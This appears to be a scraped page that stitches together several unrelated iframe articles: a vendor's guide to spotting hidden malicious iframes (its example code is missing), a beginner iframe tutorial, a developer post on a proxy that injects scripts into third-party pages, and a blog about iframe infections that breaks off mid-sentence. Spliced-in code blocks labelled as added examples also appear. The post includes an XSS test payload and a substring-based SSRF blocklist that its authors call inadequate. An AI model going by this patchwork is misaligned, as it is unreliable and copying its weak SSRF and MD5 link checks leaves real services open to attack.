How to insert an iframe into HTML: example of use. Iframe and Frame - what is it and how best to use frames in Html Changing relative URLs to absolute ones in the page code

One of the most common ways to infect the computers of website visitors is to exploit a buffer overflow vulnerability in the visitor's browser. The recipe is quite simple. Attackers inject malicious code by inserting iframes into website pages and try to download malicious files to an unsuspecting user’s computer. It is quite easy to detect such malicious inserts on your websites. You just have to pay attention to the code fragments that include an iframe. Such inserts can be in both HTML and PHP files.

Attackers almost always try to hide malicious inserts from site owners as much as possible, making them invisible to the site's users and obfuscating their code.

Hiding iframe inserts from users' eyes

To disguise a malicious insert, hackers in most cases use the same method over and over again - they set the properties of the tag so that it is not displayed on the page, but is contained in its code. Most often, the width and height are set to zero or one pixel: width="1px", height="1px".

For example, malicious code might look like this:

However, often hackers do not limit themselves to such disguise, complementing the concealment with more sophisticated techniques that can confuse and complicate search and elimination even for advanced programmers.

Obfuscation

This is one of the most common methods of protecting code in programming in unstructured languages (such as, for example, PHP). In essence, the whole "encryption" comes down to scrambling the code itself by changing the names of variables and other elements. As a result, it is quite difficult to recognize signs of maliciousness in obfuscated code; it is only possible from indirect signs, namely the explicit use of JS (JavaScript) functions that are used specifically for obfuscation: unescape, fromCharCode.

However, the discovery of obfuscated code on a website does not mean that it is definitely harmful or easy to remove. You need to understand that, firstly, attackers could obfuscate the code, also capturing part of the site’s working code. In this case, when you try to cut out an encrypted fragment, you risk crashing your resource. Secondly, obfuscated code may not be malicious, but only a consequence of the operation of your CMS or its individual components, as well as additional modules you have installed.

In any case, if you encounter suspicious obfuscated code, you need to act with the utmost care.

Other signs of infection

If you doubt whether the code you found is malicious, you can try to analyze indirect signs. If you have a large number of files on your site, you may want to pay attention to the date and time the files were last changed. If you know well how your CMS works with files, you can take a closer look at files changed on the same date at the same time, or with changes occurring at the same time interval, for example, 1 second.

If you are an advanced programmer, you can write a script that checks for the presence of the type of inserts you have detected in all files on your site. If you are even more advanced, you can force the script to cut out inserts, however, you always need to be careful.
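A sketch of such a checking script, as an added example that is not part of the original article: it flags iframes hidden by size or style and the obfuscation markers named above, and only reports, leaving removal to a human. The file names, sample contents and rule names are constructed for the demonstration.

```javascript
// Added example: heuristic scanner for hidden iframes and obfuscation markers.
// It reports findings only; it never rewrites files.

// Opening <iframe ...> tag; group 1 is the attribute string.
const IFRAME_TAG = /<iframe\b([^>]*)>/gi;

// Obfuscation markers. unescape and fromCharCode are the functions the article
// names; the third rule (an assumption of this example) catches identifiers
// assembled from short string pieces such as "fr" + "om" + "Ch".
const MARKERS = [
  { rule: "js-unescape", re: /\bunescape\s*\(/g },
  { rule: "js-fromCharCode", re: /\bfromCharCode\b/g },
  { rule: "js-split-identifier",
    re: /(["'])[A-Za-z]{1,4}\1\s*\+\s*(["'])[A-Za-z]{1,4}\2\s*\+\s*(["'])[A-Za-z]{1,4}\3/g },
];

// Reads one attribute value (quoted or bare) from a tag's attribute string.
function attr(attrs, name) {
  const re = new RegExp(
    "(?:^|\\s)" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// True when a width/height value means 0 or 1 pixel ("0", "1", "1px").
function isTiny(value) {
  return value !== null && /^\s*[01](?:px)?\s*$/i.test(value);
}

// True when an inline style hides the element or shrinks it to 0/1 pixel.
function isHiddenByStyle(style) {
  if (style === null) return false;
  return /display\s*:\s*none|visibility\s*:\s*hidden/i.test(style) ||
    /(?:^|;)\s*(?:width|height)\s*:\s*[01](?:px)?\s*(?:;|$)/i.test(style);
}

// 1-based line number of a character offset.
function lineOf(text, index) {
  return text.slice(0, index).split("\n").length;
}

// Scans one file's text and returns findings sorted by line.
function scanText(file, text) {
  const findings = [];
  const add = (rule, index, excerpt) =>
    findings.push({ file, line: lineOf(text, index), rule, excerpt: excerpt.slice(0, 80) });

  for (const m of text.matchAll(IFRAME_TAG)) {
    const tiny = isTiny(attr(m[1], "width")) || isTiny(attr(m[1], "height"));
    if (tiny || isHiddenByStyle(attr(m[1], "style"))) add("hidden-iframe", m.index, m[0]);
  }
  for (const { rule, re } of MARKERS) {
    for (const m of text.matchAll(re)) add(rule, m.index, m[0]);
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample site: one legitimate map embed, two hidden iframes,
// and a script with obfuscation markers.
const SAMPLES = {
  "index.html": [
    "<html><body>",
    '<iframe src="https://maps.example/embed" width="600" height="450"></iframe>',
    '<iframe src="http://unknown.example/x" width="1px" height="1px"></iframe>',
    '<iframe src="http://unknown.example/y" style="visibility: hidden"></iframe>',
    "</body></html>",
  ].join("\n"),
  "menu.js": [
    "function openMenu() { return true; }",
    'var f = "fr" + "om" + "Ch"; f += "arC";',
    "var s = String.fromCharCode(60, 105);",
  ].join("\n"),
};

function scanAll(files) {
  return Object.entries(files).flatMap(([name, text]) => scanText(name, text));
}

for (const f of scanAll(SAMPLES)) {
  console.log(`${f.file}:${f.line} [${f.rule}] ${f.excerpt}`);
}
```

A hit is a reason to look at the file, not proof of infection: as noted above, a CMS or its modules may legitimately ship obfuscated code.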

Alternative Methods

We recommend that you use the Virusday service to remove malicious inserts even if you are an advanced specialist. Our service not only contains many signatures that can be used to find malicious codes, but also saves time! Plus, the cost of using Virusday for cleaning will likely be much lower than paying for your own time. You will be able to detect and remove not only iframe inserts, but also many other threats. You will probably be able to find and automatically remove the threat that caused iframe inserts to appear on your site, such as Shell.

Virusday service team.

At the dawn of website building, web resources widely used frames to display individual parts of pages. But the arrival of the new version, HTML 5, changed everything. The markup elements <frame>, <frameset> and <noframes> are deprecated. They were replaced by a single tag - <iframe>. How do you add an <iframe> to HTML? The example below will be clear even to a beginner in programming.

What are frames?

The frame is the basis of most early web pages. If translated literally, this word means “frame,” that is, a frame is a small part of a page in a browser. The widespread use of frames in the past can be explained by the low quality and high cost of Internet traffic. As a rule, the site was divided into 3-5 parts, each of which served a specific purpose:

  • “header” (top frame along the width of the page) - displays the name of the resource;
  • left/right “sidebar” - displays the menu;
  • the central frame - displays the site content.

Splitting the page into parts made it possible to reload only a certain part when updating it. For example, the user clicked a menu item, and new content was downloaded to the central frame.

Modern Frames in HTML 5

Why is <iframe> needed in HTML? An example is inserting content from a third-party resource. The classic situation is when a web developer wants to show the location of an object on a map. What should they do? Draw a site plan from scratch? No - there is a simpler solution: embed a Google Maps, Yandex Maps or 2GIS element on the page. The problem is solved in four steps.

  • You need to go to the website of any mapping service.
  • Find the desired object. Once you know the exact address, you can enter it in the search window.
  • Using the “Save and get code” button (for Yandex.Maps) or “Done” (for google maps) get the embed code.
  • All that remains is to enter the generated markup tags onto the page.
  • Additionally, you can select the map size and configure other display options.

    How else can you use <iframe> in HTML? An example is inserting video materials from YouTube. Multimedia technologies attract Internet users, which is why video content is so popular. The developer can embed a video quickly.

  • You should upload your own video to YouTube or find a third-party file to broadcast.
  • Get the <iframe> tag by selecting the "HTML Code" button.
  • The final step is to paste the <iframe> into the HTML. An example of the resulting tag content will be discussed below.

    Both examples used automatic code generation, but professional developers should be able to write code themselves. Firstly, this will allow them to understand the layout of the page and, if necessary, modify it. Secondly, the markup of site elements (even though they belong to an external resource) is not always formed without the participation of the webmaster. This is where the high qualifications of the developer come into play.

    Syntax

    So, before you start laying out the page, you need to consider the iframe (html) tag: what it is and how to use it correctly.

    First of all, it should be noted that the <iframe> tag is paired. Between the opening and closing elements, you specify the content that will be displayed in browsers that do not support this markup element. Main tag attributes:

    • width (width);
    • height (height);
    • src (address of the loaded resource);
    • align (alignment method);
    • frameborder;
    • allowfullscreen.

    Thus, the code for <iframe>. The HTML example is demonstrated in full below:

    In the above markup, it is enough to replace the site address with any other one and, if necessary, adjust the frame size.

    Element

    Frames

    What does it do?

    How to insert a page into an HTML page? To do this, you need to use <iframe>, which creates an inline frame in the current document in which another HTML document is displayed.

    Display

    Display block.

    Example code

    Powerful yet easy to use

    Back in the bad old days of web design, there were many <frame> elements that ruined the life of every developer. They were almost always a bad design approach. Luckily the <frame> element has been deprecated in HTML5. But <iframe>, or "inline frame", is still available. Will it be deprecated in the next version? Maybe we should avoid it? There are several valid uses of this element when creating an HTML page. But you need to understand what it is and how it works to avoid mistakes.

    Similarities and differences between <frame> and <iframe>

    Both of these elements allow you to embed a separate HTML document. A link to the content of the document referenced by the current web page is specified in the src attribute.

    The main difference between <frame> and <iframe> is that <iframe> enforces the rule that the HTML document takes precedence. Content is displayed within an element that is part of the current document. As an example, consider this embedded video taken from YouTube:

    The video is clearly on an HTML page, and not on some separate panel. The <frame> element broke this paradigm and allowed the document to exercise control over the browser window, breaking it into several small panels (frames), each of which displays a separate document. All other differences between <frame> and <iframe> follow from this basic difference.

    Don't remake frame-based layouts with iframes

    Someday you may be faced with the task of updating an old website that was built using frames. You might also want to use a fixed-width layout to recreate the same nightmare of independent panels and sills. But you won't be able to use the target attribute to open the link in a separate frame. You can start looking for JavaScript solutions. Please, do not do that.

    Good (and terrible) uses

    There are several valid use cases for <iframe> when creating an HTML page:

    • embedding third-party media content;
    • embedding your own media content through a cross-platform document;
    • embedding code examples;
    • embedding third-party “applets” as forms of payment.

    Here are some terrible use cases:

    • Photo gallery;
    • forum or chat.

    If you need to embed independent, pre-existing HTML documents into the current one, use <iframe>. If you're building everything from scratch, there's no reason to split the page design into multiple separate documents. Especially if they aren't actually independent pieces of content.

    iframe attributes
    | Attribute name | Value | Description |
    |---|---|---|
    | sandbox | allow-same-origin, allow-top-navigation, allow-forms, allow-scripts | Sets a number of restrictions on the content loaded into the frame. Set before creating an HTML page. |
    | scrolling | yes, no, auto | Determines whether to show scrollbars in the frame or not. Deprecated in HTML5. Use CSS instead. |
    | name | name | Specifies the name of the frame. |
    | align | left, right, top, middle, bottom | Determines the frame's alignment relative to surrounding elements. Is outdated. Use CSS instead. |
    | frameborder | yes (or 1), no | Used to enable the display of a border around the frame. Deprecated in HTML5. Use CSS instead. |
    | longdesc | URL | Used to specify the URL of a page that contains a long description of the contents of the frame. Is outdated. Use CSS instead. |
    | marginwidth | pixels | Used to control the width of the padding from the content to the frame border. Is outdated. Use CSS instead. |
    | src | URL | Specifies the document URL to display in the IFRAME. |
    | vspace | pixels | Sets the vertical margins from the frame to the surrounding content. Is outdated. Use CSS instead. |
    | width | pixels, % | Defines the width of the frame on the HTML page. |

    This publication is a translation of the article “”, prepared by the friendly project team

    We made an analogue of the Google Webmaster Marker tool. Let me remind you that Marker is a tool in the Google Webmaster account that allows you to annotate your pages with Open Graph tags. To do this, you simply select a piece of text on the page with your mouse and indicate that this is the title, and this is the rating. Your page is loaded into an iframe in the webmaster's account.

    Now Google, having encountered a similar page on your site, already knows what kind of content is published on it, and how to beautifully parse it into its essence (article, product, video..)

    We needed similar functionality. The task seemed simple and exclusively client-side. However, in practice, the solution lies at the intersection of client side and server side (“pure” JS programmers may not know anything about various proxy servers and take a very long time to approach the project). However, I did not find an article on the Internet that would describe the entire technology from start to finish. I would also like to say thank you to the BeLove user and our security team for their help.

    In our case, we wanted the webmaster to be able to conveniently (by clicking with the mouse) get the xPath value for certain elements on his page.

    Iframe “Same Origin”

    So, in our admin panel a person enters the URL of a page of his site, we display it in an iframe, the person points the mouse where necessary, and we get the required xPath. Everything would be OK, but because of the browser’s security policy we do not have access to the content of a page from another domain loaded into an iframe in our admin panel (our domain).

    CORS - Cross-Origin Resource Sharing

    Some people advised me to use CORS, a fashionable technology that solves many problems with accessing content from another domain in the browser and allows you to bypass same-origin policy restrictions.
    A site that wants to give access to its content on the pages of someone else’s domain simply writes in the HTTP header:
    Access-Control-Allow-Origin: http://example.com
    And the header of the HTTP request that the browser sends from a page of another domain must contain an Origin field:
    Origin: www.mysupersite.com
    It is clear that the browser itself adds the Origin field to the request. Let's look at the article on Habr and see that modern browsers add Origin even to a request for the same domain:

    However:

  • the browser does not send Origin in the header of the request for the page being loaded into the iframe (can anyone explain why?)
  • we don't want to ask webmasters to set the Access-Control-Allow-Origin header

    Iframe sandbox

    Another fashionable technology. Sandbox is an attribute of the iframe tag. One of the values of this attribute is allow-same-origin. Before I started digging into this topic, I didn’t know what exactly this attribute does, but it sounded very tempting. However, the sandbox attribute simply limits what a page loaded in an iframe can do and has no bearing on the issue of accessing the contents of the frame from the parent document.

    Specifically, the allow-same-origin value (or rather, its absence) just says that the iframe should always be regarded as loaded from a foreign domain (for example, it cannot send an AJAX request to the domain of the parent document).

    Let's see how Google did it

    Time to see how big brother did it.

    Let's pay attention to the src attribute of the iframe element: src="https://wmthighlighter.googleusercontent.com/webmasters/data-highlighter/RenderFrame/007....." - our page is loaded into the admin panel from a Google domain. It gets even stricter: even scripts and images in the source document are run through a proxy. All src, href... are replaced in the HTML with proxied ones. Something like this:

    All resources that your page uses are also stored on Google proxy servers. Here's ours for example.

    CGIProxy?

    At first it seemed that to do the same thing you need to set up a full-fledged proxy like CGIProxy. This proxy server does approximately the same thing as Google's wmthighlighter.googleusercontent.com:
    Visit the script's URL to start a browsing session. Once you've gotten a page through the proxy, everything it links to will automatically go through the proxy. You can bookmark pages you browse to, and your bookmarks will go through the proxy as they did the first time.

    Your own proxy!

    However, if you narrow the task down, writing a simple proxy yourself is much easier. Google sends all page content through a proxy, but that is not necessary at all. We just need the HTML of any page to be served from our domain, and resources can be loaded from the original domain. We have discarded HTTPS for now.
    There is no need for super performance or convenient settings here, and this can be done quickly with anything, from node.js to PHP. We wrote a servlet in Java.

    Download the page

    What should a proxy servlet do? Using the GET parameter, we get the URL of the page that needs to be loaded, then download the page.

    Be sure to determine the encoding of the page (via the HTTP response or the charset in the HTML) - our proxy must respond in the same encoding as the page we loaded. We’ll also determine the Content-Type just in case, although it’s clear that we’re getting the page as text/html and will give it back the same way.
    // The address of the page to load comes from the "url" GET parameter
    final String url = request.getParameter("url");
    final HttpGet requestApache = new HttpGet(url);
    final HttpClient httpClient = new DefaultHttpClient();
    final HttpResponse responseApache = httpClient.execute(requestApache);
    final HttpEntity entity = responseApache.getEntity();
    // Remember the encoding and MIME type so the proxy can answer with the same ones
    final String encoding = EntityUtils.getContentCharSet(entity);
    final String mime = EntityUtils.getContentMimeType(entity);
    String responseText = IOUtils.toString(entity.getContent(), encoding);
    *For those who like to evaluate other people's code: in our team, everyone has the same Eclipse code formatting settings, and when saving a file, Eclipse itself adds final to all variables if they do not change anywhere else. Which, by the way, is quite convenient in the end.

    Changing relative URLs to absolute ones in the page code

    You need to go through all the src and href attributes in the page (paths of style files, images), and replace relative URLs with absolute ones. Otherwise, the page will try to download images from some folders on our proxy, which we naturally don’t have. Any language has ready-made classes, or you can find code snippets for this on stackoverflow:
    final URI uri = new URI(url);
    final String host = uri.getHost();
    responseText = replaceRelativeLinks(host, responseText);

    Sending the HTML

    That's all, the proxy servlet is ready. We send a response, setting the required encoding and MIME type.
    protected void sendResponse(HttpServletResponse response, String responseText,
            String encoding, String mime) throws ServletException, IOException {
        response.setContentType(mime);
        response.setCharacterEncoding(encoding);
        response.setStatus(HttpServletResponse.SC_OK);
        response.getWriter().print(responseText);
        response.flushBuffer();
    }

    Deploy and test

    We deploy our proxy servlet to the same address as the admin panel, adminpanel.indexisto.com, load the webmaster’s website page into our iframe through the proxy, and all cross-domain problems disappear.
    Our proxy works at
    http://adminpanel.indexisto.com/highlighter?url=http://habrahabr.ru
    - this is how Habr will load from our domain. We give this address to the iframe and try to access the Habr DOM tree via JS in the admin panel - everything works. CSRF naturally will not work, since the page was loaded from our proxy, which does not have cookies.

    SSRF problem

    Let’s load the site with the “localhost” address into our iframe - oops, there is the start page of our nginx. Let's try some internal (not visible from the outside) resource on the same network as our proxy server. For example secured_crm.indexisto.com - it is there as well.
    Of course, we try to prohibit these things in our proxy; if someone tries to proxy localhost, we exit without returning anything:
    if (url.contains("localhost") || url.contains("127")
            || url.contains("highlighter") || url.contains("file")) {
        LOG.debug("Trying to get local resource. Url = " + url);
        return;
    }
    but we clearly cannot list all network resources here. This means we need to move the proxy into a completely isolated environment so that the machine sees nothing except the Internet, itself and our proxy. We select a machine, configure it and launch our servlet there.

    XSS problem

    Let's load into our iframe a page of our own on which we write:
    <script>alert("xss")</script>
    An alert pops up. Sadly. This can be worked around with the iframe sandbox attribute and its allow-scripts value, but what about older browsers that don’t really understand this attribute? Only your own cookies can be stolen this way, but it still cannot be left as it is.
    We move the servlet not only to a separate machine, but also give it a separate subdomain highlighter.indexisto.com .
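The SSRF section above notes that a substring blocklist cannot enumerate internal resources. As an added example that is not the authors' servlet code, the check below decides on the parsed URL and on the addresses the host resolves to instead. The function names, the address ranges chosen and the resolver table are assumptions of this example; in a real proxy the resolver would be a DNS lookup and the fetch would connect to the vetted address.

```javascript
// Added example: SSRF target check on the parsed URL and resolved addresses
// rather than on substrings. Hosts and addresses in RESOLVER are constructed.

const BLOCKED_V4 = [ // [network, prefix length]: loopback, private, link-local, ...
  ["0.0.0.0", 8], ["10.0.0.0", 8], ["100.64.0.0", 10], ["127.0.0.0", 8],
  ["169.254.0.0", 16], ["172.16.0.0", 12], ["192.168.0.0", 16], ["224.0.0.0", 3],
];

// Dotted quad -> unsigned 32-bit integer, or null if not an IPv4 literal.
function ipv4ToInt(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((x) => x > 255)) return null;
  return ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
}

// True when the address must never be fetched by the proxy.
function isBlockedAddress(ip) {
  const v4 = ipv4ToInt(ip);
  if (v4 !== null) {
    return BLOCKED_V4.some(([net, bits]) => {
      const mask = (0xffffffff << (32 - bits)) >>> 0;
      return ((v4 & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
    });
  }
  if (ip.includes(":")) {
    const first = parseInt(ip.split(":")[0] || "0", 16);
    return first === 0 ||                   // ::, ::1, IPv4-mapped ::ffff:a.b.c.d
      (first & 0xfe00) === 0xfc00 ||        // fc00::/7 unique local
      (first & 0xffc0) === 0xfe80 ||        // fe80::/10 link-local
      (first & 0xff00) === 0xff00;          // ff00::/8 multicast
  }
  return true; // not an address at all: refuse
}

// The substring check from the article, ported for comparison (true = allowed).
function naiveCheck(url) {
  return !["localhost", "127", "highlighter", "file"].some((s) => url.includes(s));
}

// resolve(hostname) must return every address the name maps to.
function checkProxyTarget(rawUrl, resolve) {
  let u;
  try { u = new URL(rawUrl); } catch { return { ok: false, reason: "unparseable URL" }; }
  if (u.protocol !== "http:" && u.protocol !== "https:") {
    return { ok: false, reason: "scheme not allowed" };
  }
  if (u.username || u.password) return { ok: false, reason: "credentials in URL" };

  const host = u.hostname.replace(/^\[|\]$/g, ""); // strip IPv6 brackets
  const isLiteral = ipv4ToInt(host) !== null || host.includes(":");
  const addrs = isLiteral ? [host] : resolve(host);
  if (addrs.length === 0) return { ok: false, reason: "host does not resolve" };

  const bad = addrs.find(isBlockedAddress);
  if (bad) return { ok: false, reason: "internal address " + bad };
  // Connect to this exact address, so a second lookup cannot return another one.
  return { ok: true, host, connectTo: addrs[0] };
}

// Constructed resolver table standing in for DNS.
const RESOLVER = {
  "habrahabr.ru": ["203.0.113.10"],
  "localhost": ["127.0.0.1"],
  "secured_crm.indexisto.com": ["10.0.0.12"],
};
const resolve = (host) => RESOLVER[host] || [];

for (const url of ["http://habrahabr.ru/post/127/", "http://localhost/",
  "http://secured_crm.indexisto.com/", "http://[::1]/", "file:///tmp/x"]) {
  console.log(url, "naive:", naiveCheck(url), "checked:", checkProxyTarget(url, resolve));
}
```

This complements, and does not replace, the network isolation the article settles on.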

    And here we are: we have broken our own workaround for the cross-domain restrictions. Now we can't reach the iframe content again.

    Continuing to find a solution from Google, I opened our page served through a proxy in a separate window

    And I noticed a strange error in the console.
    CrossPageChannel: Can't connect, peer window-object not set.
    It became clear that organizing everything was more complicated than simply loading a page into an iframe from your domain. Pages communicate with each other. Accordingly, we move towards window.postMessage

    Post Message

    It would be inhumane to force the webmaster to embed our script into their page, a script that lets page elements be selected with the mouse and then sends the xPath of these elements to us in the parent document via postMessage. However, nothing stops our proxy from injecting any scripts into the page loaded into the iframe.
    We save all the scripts necessary for injection into a file and insert them before the closing body tag:
    final int positionToInsert = responseText.indexOf("</body>");
    final InputStream inputStream = getServletContext().getResourceAsStream("/WEB-INF/inject.js");
    final StringWriter writer = new StringWriter();
    IOUtils.copy(inputStream, writer);
    final String jsToInsert = writer.toString();
    responseText = responseText.substring(0, positionToInsert) + jsToInsert
            + responseText.substring(positionToInsert, responseText.length());
    For testing, we insert an alert - everything works.

    The JS part - highlighting the DOM element under the mouse and getting the xPath

    Okay, let's move on to the actual JS that we inserted into the webmaster's page.
    We need to highlight the DOM elements over which a person moves the mouse. It is better to do this with a shadow, because then the element does not shift and the page does not jump. We hang onmouseover on the body and look at the target of the event. In the same handler I calculate the xPath of the element. It would be better to calculate the xPath of an element on click, but I didn’t notice any slowdowns in this implementation either.
    elmFrame.contentWindow.document.body.onmouseover = function(ev) {
        ev.target.style.boxShadow = "0px 0px 5px red";
        curXpath = getXPathFromElement(ev.target);
    }
    I'm not providing the implementation of getting the xPath of a DOM element here. There are many snippets on how to do this. These snippets can be modified to suit your needs: for example, you may need only tags in the xPath, or ids if they exist and classes if there are no ids - everyone has their own requirements.

    Here is an example of the Habr home page served through the proxy with the script embedded:
    http://highlighter.indexisto.com/?md5=6ec7rdHxUfRkrFy55jrJQA==&url=http%3A%2F%2Fhabrahabr.ru&expires=1390468360

    JS part - processing the click

    A person’s click on the page in the iframe is immediately “extinguished” (the link in the iframe will not be followed). We also send the string of the resulting xPath to the parent window (we saved it at the stage of moving the mouse over the element):
    document.body.onclick = function(ev) {
        window.parent.postMessage(curXpath, "*");
        ev.preventDefault();
        ev.stopPropagation();
    }

    Profit!

    That's all, now in our admin panel a webmaster can get xPath paths to elements on their pages much more quickly and easily.
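The click handler above posts to "*", and the page inside the iframe is third-party content, so the admin panel has to treat every message as untrusted. The following is an added example, not the authors' code, of a parent-side receiver and of a sender pinned to one target origin. The two origins are taken from the host names in the article; the function names, the length limit and the accepted xPath shape are assumptions of this example.

```javascript
// Added example: validating xPath messages in the admin panel (parent window).

const HIGHLIGHTER_ORIGIN = "http://highlighter.indexisto.com"; // proxy subdomain
const ADMIN_ORIGIN = "http://adminpanel.indexisto.com";        // parent page

const MAX_XPATH_LENGTH = 512;
// Accepted shape (assumption): /tag or //tag steps with optional [n],
// [@id="..."] or [@class="..."] predicates. Anything else is dropped.
const XPATH_SHAPE =
  /^(?:\/{1,2}[A-Za-z][\w-]*(?:\[(?:\d+|@(?:id|class)=(?:"[\w\s-]*"|'[\w\s-]*'))\])*)+$/;

// Builds the "message" listener. frameWindow is iframe.contentWindow,
// onXpath is called only for messages that pass every check.
function makeXpathReceiver(frameWindow, onXpath) {
  return function onMessage(event) {
    // 1. The message must come from the proxy origin, not from any open page.
    if (event.origin !== HIGHLIGHTER_ORIGIN) return false;
    // 2. It must come from our iframe, not another window on that origin.
    if (event.source !== frameWindow) return false;
    // 3. The payload is data from a page we do not control: check type and size.
    if (typeof event.data !== "string" || event.data.length > MAX_XPATH_LENGTH) return false;
    // 4. Only an xPath-shaped string is passed on; it is never used as HTML.
    if (!XPATH_SHAPE.test(event.data)) return false;
    onXpath(event.data);
    return true;
  };
}

// Sender side for the injected script: name the admin panel as the only
// allowed recipient instead of "*".
function sendXpath(parentWindow, xpath) {
  parentWindow.postMessage(xpath, ADMIN_ORIGIN);
}

// Browser wiring (not executed here):
//   const frame = document.getElementById("highlighter-frame"); // hypothetical id
//   window.addEventListener("message",
//     makeXpathReceiver(frame.contentWindow, (xp) => { input.value = xp; }));

// Constructed events standing in for MessageEvent objects.
function demo() {
  const frame = {};
  const received = [];
  const onMessage = makeXpathReceiver(frame, (xp) => received.push(xp));
  const results = [
    onMessage({ origin: HIGHLIGHTER_ORIGIN, source: frame, data: "/html/body/div[2]/h1" }),
    onMessage({ origin: "http://other.example", source: frame, data: "/html/body" }),
    onMessage({ origin: HIGHLIGHTER_ORIGIN, source: {}, data: "/html/body" }),
    onMessage({ origin: HIGHLIGHTER_ORIGIN, source: frame, data: "<b>not an xpath</b>" }),
    onMessage({ origin: HIGHLIGHTER_ORIGIN, source: frame, data: { xpath: "/html" } }),
  ];
  return { results, received };
}

console.log(demo());
```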

    Let's add some more security

    Okay, everything worked for us, but there is a problem: our proxy faces the world completely unprotected. Anyone can proxy anything.

    We put nginx in front of the proxy, it listens to port 80, and we remove the proxy itself to another port. We close all other ports except 80 from the outside world.

    Now let's make the proxy work only through the admin panel. At the moment when the webmaster enters the URL of his site, we quickly go to the server, where we generate an md5 hash from the current timestamp + 1 hour, the URL itself and a super-secret key:
    final String md5Me = timeStampExpires + urlEncoded + "SUPERSECRET";
    final MessageDigest md = MessageDigest.getInstance("MD5");
    md.reset();
    md.update(md5Me.getBytes("UTF-8"));
    String code = Base64.encodeBase64String(md.digest());
    // Convert canonical base64 to the filename-safe alphabet nginx expects
    code = code.replaceAll("/", "_");
    code = code.replaceAll("\\+", "-");
    Also note that in the code we receive the md5 string not as the usual hex, but in base64 encoding, plus in the resulting md5 we make strange replacements of the slash and plus characters with underscores and dashes.
    The fact is that nginx uses the base64 Filename Safe Alphabet, tools.ietf.org/html/rfc3548#page-6,
    while Java gives canonical base64.

    Having received a response from a server with secure md5 in our admin panel, we try to load the following url into the iframe:
    highlighter.indexisto.com/?md5=Dr4u2Yeb3NrBQLgyDAFrHg==&url=http%3A%2F%2Fhabrahabr.ru&expires=1389791582

    Now we configure the nginx HttpSecureLinkModule module. This module checks the md5 of all the parameters that came to it (the same secret key is registered in the module as in the admin servlet), checks whether the link has expired, and only then forwards the request to our proxy servlet.

    Now no one can use our proxy from outside the admin panel, and no one can embed anywhere an image that sends requests to our server - the link will die in an hour anyway.
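The signing scheme described above, with both the minting side (the admin servlet's role) and the checking side (the role nginx plays), as an added example that is not the authors' code or nginx's. It keeps the article's input order (expires + encoded URL + secret) and the base64 character replacements; the function names and the timestamps are constructed, and "SUPERSECRET" is the article's placeholder for a long random secret.

```javascript
// Added example: minting and verifying an expiring md5 link.
const crypto = require("crypto");

const SECRET = "SUPERSECRET";   // placeholder from the article
const LIFETIME_SECONDS = 3600;  // "current timestamp + 1 hour"

// md5(expires + urlEncoded + secret) in base64 with "/" -> "_" and "+" -> "-".
function token(expires, urlEncoded, secret) {
  return crypto.createHash("md5")
    .update(String(expires) + urlEncoded + secret, "utf8")
    .digest("base64")
    .replace(/\//g, "_")
    .replace(/\+/g, "-");
}

// Admin-panel side: build the link that goes into the iframe src.
function mintLink(targetUrl, nowSeconds, secret = SECRET) {
  const expires = nowSeconds + LIFETIME_SECONDS;
  const urlEncoded = encodeURIComponent(targetUrl);
  return `/?md5=${token(expires, urlEncoded, secret)}&url=${urlEncoded}&expires=${expires}`;
}

// Raw (still percent-encoded) query values: the hash covers the encoded URL.
function rawQuery(link) {
  const out = {};
  for (const pair of link.slice(link.indexOf("?") + 1).split("&")) {
    const i = pair.indexOf("=");
    if (i > 0) out[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return out;
}

// Gateway side: recompute the hash, compare in constant time, then check expiry.
function verifyLink(link, nowSeconds, secret = SECRET) {
  const { md5, url, expires } = rawQuery(link);
  if (!md5 || !url || !/^\d{1,12}$/.test(expires || "")) {
    return { ok: false, reason: "malformed" };
  }
  const expected = Buffer.from(token(Number(expires), url, secret));
  const given = Buffer.from(md5);
  if (given.length !== expected.length || !crypto.timingSafeEqual(given, expected)) {
    return { ok: false, reason: "bad signature" };
  }
  if (Number(expires) <= nowSeconds) return { ok: false, reason: "expired" };
  return { ok: true, url: decodeURIComponent(url) };
}

// Constructed timeline: link minted at NOW, checked at once, late, and tampered.
const NOW = 1389787982;
const link = mintLink("http://habrahabr.ru", NOW);
console.log(link);
console.log(verifyLink(link, NOW));
console.log(verifyLink(link, NOW + LIFETIME_SECONDS + 1));
console.log(verifyLink(link.replace("habrahabr.ru", "example.org"), NOW));
```

Because expires is part of the hashed string, changing it in the query invalidates the link just as changing the URL does.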

    That's all folks!

    Google naturally went much further with its marker tool. In order to clearly identify an element on a page, you need to mark the same element (for example, the title of an article) on several pages of the same type, so that you can build the xPath more accurately and discard ids like “post-2334" that will obviously only work on one page. In our admin panel, for now the xPath needs to be corrected by hand to get an acceptable result.

    I wanted to start my blog with lyrics, but it was such a turbulent week that I decided to greet everyone with a substantive article. Hello!

    And the whole week passed in wars with constant hacking of my hosting and infection of all JavaScript files with iframes, and this is no less than about 2500 scripts and all sites with viruses.

    I didn’t have time to clear all the files in a day in manual mode and change passwords, but the next day everything happened again - the passwords somehow leaked and the scripts were again successfully accessed via FTP.

    Friday of the week was the last straw and I spent the day protecting my servers:

  • Configured .ftpaccess on the servers - thereby limiting FTP access to servers from all IPs except your static one;
  • I wrote an auto-removal script for iframes and viruses from all .js files.

    So, in order.

    Infection of site files occurs by simply inserting iframe code into files via FTP. Previously, I more often observed insertions into .php and .html files, which led to the complete crash of sites; today malware has become kinder and has begun to write inserts exclusively in files with the extension .js (JavaScript). IFRAME inserts are written at the end of the file and can be either in explicit form (easily detected by antiviruses) or in encoded form (the work of various iframe cryptors), for example:

